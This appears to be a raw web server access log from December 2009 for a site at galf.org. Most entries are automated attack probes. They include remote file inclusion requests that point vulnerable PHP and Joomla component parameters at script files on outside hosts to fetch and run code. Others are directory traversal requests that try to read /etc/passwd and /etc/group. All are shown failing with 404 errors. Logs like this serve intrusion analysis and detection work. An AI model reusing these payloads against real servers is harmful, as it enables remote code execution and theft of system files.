91.121.181.60 - - [20/Dec/2009:18:52:00 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:52:00 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:52:03 -0800] "GET /logs/access_090907.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:52:05 -0800] "GET /logs/access_090907.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.37 - - [20/Dec/2009:18:52:23 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; CMS Music Store2 v1.00.09 (Music Store,1033); (R1 1.5); .NET CLR 1.1.4322)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:52:55 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:52:55 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:52:55 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:52:58 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:52:58 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:52:58 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:53:52 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:53:52 -0800] "GET /logs/access_090706.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:18:53:52 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:54:05 -0800] "GET /logs/access_090706.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:54:17 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:54:17 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:54:17 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:54:23 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:18:54:54 -0800] "GET /logs/index2.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:18:54:54 -0800] "GET /index2.php?x=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:18:54:55 -0800] "GET /logs/index2.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
81.174.65.34 - - [20/Dec/2009:18:54:55 -0800] "GET /index2.php?x=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:55:09 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:55:19 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:55:54 -0800] "GET /logs/access_091116.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:18:56:12 -0800] "GET /logs/access_091116.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:57:03 -0800] "GET /add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:57:03 -0800] "GET /logs//add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [20/Dec/2009:18:57:03 -0800] "GET /logs/access_090629.log//add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://ourfathersworld.org/cp/scripts/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:58:28 -0800] "GET /logs/access_091026.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:18:58:48 -0800] "GET /logs/access_090629.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:59:19 -0800] "GET /logs//add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:59:19 -0800] "GET /logs/access_090629.log//add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.187.91.50 - - [20/Dec/2009:18:59:20 -0800] "GET /add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://namok.co.kr/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:19:01:05 -0800] "GET /logs/access_090914.log%20/index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:19:01:05 -0800] "GET /index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:19:01:05 -0800] "GET /logs/index.php?nic=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:19:01:16 -0800] "GET /logs/access_090914.log%20/index.php?nic=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.207.123 - - [20/Dec/2009:19:06:03 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
203.197.196.10 - - [20/Dec/2009:19:06:10 -0800] "GET /logs//index.php?page=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
203.197.196.10 - - [20/Dec/2009:19:06:10 -0800] "GET /index.php?page=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:08:50 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:08:50 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:08:50 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.19.51.194 - - [20/Dec/2009:19:10:41 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:10:42 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.51.194 - - [20/Dec/2009:19:10:42 -0800] "GET /logs/access_090706.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vostokmedia.com//files/Image/17/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:10:58 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:10:58 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:10:58 -0800] "GET /logs/access_090706.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.250.149.132 - - [20/Dec/2009:19:11:58 -0800] "GET /ws/login.php?noSet=0&includedir=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
210.250.149.132 - - [20/Dec/2009:19:11:58 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:12:47 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:13:21 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:13:21 -0800] "GET /logs/access_090928.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:13:21 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:13:38 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:13:38 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:13:38 -0800] "GET /logs/access_090928.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:14:17 -0800] "GET /logs/access_090706.log//modules/agendax/addevent.inc.php?agendax_path=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:14:17 -0800] "GET /logs/access_090706.log//modules/agendax/addevent.inc.php?agendax_path=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:14:51 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:14:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:14:51 -0800] "GET /logs/access_090629.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:15:04 -0800] "GET /logs/access_090706.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:15:04 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:15:04 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:15:16 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:15:16 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:15:16 -0800] "GET /logs/access_090706.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:15:16 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:15:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:15:16 -0800] "GET /logs/access_090629.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:16:36 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:16:43 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:21:39 -0800] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:21:39 -0800] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:21:40 -0800] "GET /logs/access_090706.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:22:54 -0800] "GET /logs/access_090921.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:19:32:16 -0800] "GET /logs/access_090921.log//oneadmin/faqsupport/include.php?path[docroot]=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:19:32:16 -0800] "GET /oneadmin/faqsupport/include.php?path[docroot]=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:19:32:16 -0800] "GET /logs//oneadmin/faqsupport/include.php?path[docroot]=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:33:12 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:33:12 -0800] "GET /include/main.php?config[search_disp]=true&include_dir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:19:33:40 -0800] "GET /logs/access_090921.log%20%20//oneadmin/faqsupport/include.php?path[docroot]=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [20/Dec/2009:19:33:54 -0800] "GET /logs/access_090706.log%20%20//oneadmin/faqsupport/include.php?path[docroot]=http://med.buu.ac.th/administrator/popups/id2?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:37:44 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:37:44 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:19:37:44 -0800] "GET /logs/access_090706.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:38:04 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:38:04 -0800] "GET /logs/access_091012.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:38:04 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [20/Dec/2009:19:38:07 -0800] "GET /logs/access_090803.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.123 - - [20/Dec/2009:19:38:19 -0800] "GET /tmp/?D=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:38:33 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:19:38:33 -0800] "GET /logs//include/main.php?config[search_disp]=true&include_dir=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:40:55 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:40:55 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:40:55 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.6.22.182 - - [20/Dec/2009:19:40:57 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:03 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:03 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:03 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:03 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:08 -0800] "GET /logs/access_091130.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:17 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:17 -0800] "GET /logs/access_091109.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:17 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.105.128.135 - - [20/Dec/2009:19:41:17 -0800] "GET /logs/access_091130.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.hjm-motorradtuning.de/images/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:41:56 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:41:56 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.203.208.203 - - [20/Dec/2009:19:41:56 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.elc.tomsk.ru/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
